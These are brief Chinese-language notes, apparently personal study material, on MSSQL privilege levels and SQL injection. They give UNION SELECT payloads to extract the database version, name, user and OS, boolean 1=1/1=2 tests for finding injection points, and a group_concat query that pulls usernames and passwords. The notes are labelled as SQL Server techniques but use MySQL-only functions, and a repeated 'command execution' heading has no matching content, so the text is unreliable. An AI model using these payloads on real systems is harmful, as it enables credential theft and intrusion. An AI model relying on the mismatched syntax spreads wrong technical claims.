1. mssql权限
- sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限
- db权限:文件管理,数据库操作等 users-administrators
- public权限:数据库操作 guest-users
2、sql server注入执行命令
查询数据库版本,数据库名字,用户名,操作系统
select * from member where id=-1 union select version(),database(),user(),@@version_compile_os;
//sql server注入执行命令
判断注入点—报错查询
select * from member where id=1 and 1=1;
select * from member where id=1 and 1=2;
//sql server注入执行命令
group_concat 查询
将查询的内容连在一起,列如:
select group_concat(username,pw) from member where id=1;
//sql server注入执行命令